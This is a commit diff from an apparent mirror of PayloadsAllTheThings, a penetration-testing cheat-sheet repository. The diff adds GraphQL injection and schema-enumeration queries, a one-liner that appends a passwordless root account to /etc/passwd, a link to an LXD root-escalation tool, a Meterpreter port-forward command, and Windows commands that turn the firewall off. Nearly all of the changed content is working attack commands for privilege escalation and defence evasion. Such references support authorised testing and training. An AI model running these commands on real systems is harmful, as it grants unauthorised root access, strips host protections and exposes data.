mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
GraphQL + LXD/etc/passwd PrivEsc + Win firewall
This commit is contained in:
parent
00f50c5f32
commit
93f6c03b54
BIN
GraphQL Injection/Images/htb-help.png
Normal file
BIN
GraphQL Injection/Images/htb-help.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 21 KiB |
@ -4,10 +4,10 @@
|
||||
|
||||
## Exploit
|
||||
|
||||
Identify an injection point
|
||||
### Identify an injection point
|
||||
|
||||
```javascript
|
||||
?param={__schema{types{name}}}
|
||||
```js
|
||||
example.com/graphql?query={__schema{types{name}}}
|
||||
```
|
||||
Check if errors are visible
|
||||
|
||||
@ -17,7 +17,15 @@ Check if errors are visible
|
||||
?param={thisdefinitelydoesnotexist}
|
||||
```
|
||||
|
||||
Enumerate Database Schema with the following GraphQL query
|
||||
### Extract data
|
||||
|
||||
```js
|
||||
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
|
||||
```
|
||||
|
||||
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
|
||||
|
||||
### Enumerate Database Schema with the following GraphQL query
|
||||
|
||||
```javascript
|
||||
fragment FullType on __Type {
|
||||
@ -114,10 +122,9 @@ query IntrospectionQuery {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
```
|
||||
|
||||
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
|
||||
### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
|
||||
|
||||
```javascript
|
||||
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
|
||||
@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query,
|
||||
|
||||
* [Introduction to GraphQL](https://graphql.org/learn/)
|
||||
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
|
||||
|
||||
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
|
||||
|
@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
|
||||
|
||||
You can now use the `su` command with `hacker:hacker`
|
||||
|
||||
Alternatively you can use the following lines to add a dummy user without a password.
|
||||
WARNING: you might degrade the current security of the machine.
|
||||
|
||||
```powershell
|
||||
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
|
||||
su - dummy
|
||||
```
|
||||
|
||||
|
||||
## NFS Root Squashing
|
||||
|
||||
@ -526,6 +534,8 @@ lxc start mycontainer
|
||||
lxc exec mycontainer /bin/sh
|
||||
```
|
||||
|
||||
Alternatively https://github.com/initstring/lxd_root
|
||||
|
||||
## References
|
||||
|
||||
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
|
||||
|
@ -85,6 +85,7 @@ optional arguments:
|
||||
|
||||
```c
|
||||
portfwd list
|
||||
portfwd add -l 88 -p 88 -r 127.0.0.1
|
||||
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
|
||||
|
||||
or
|
||||
|
@ -172,6 +172,13 @@ List firewall's blocked ports
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
netsh firewall set opmode disable
|
||||
netsh advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
List all network shares
|
||||
|
||||
```powershell
|
||||
|
@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability,
|
||||
|
||||
An XSLT can be carried out by using the `transform` element.
|
||||
|
||||
![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
|
||||
![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
|
||||
Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack)
|
||||
|
||||
```xml
|
||||
|
Loading…
Reference in New Issue
Block a user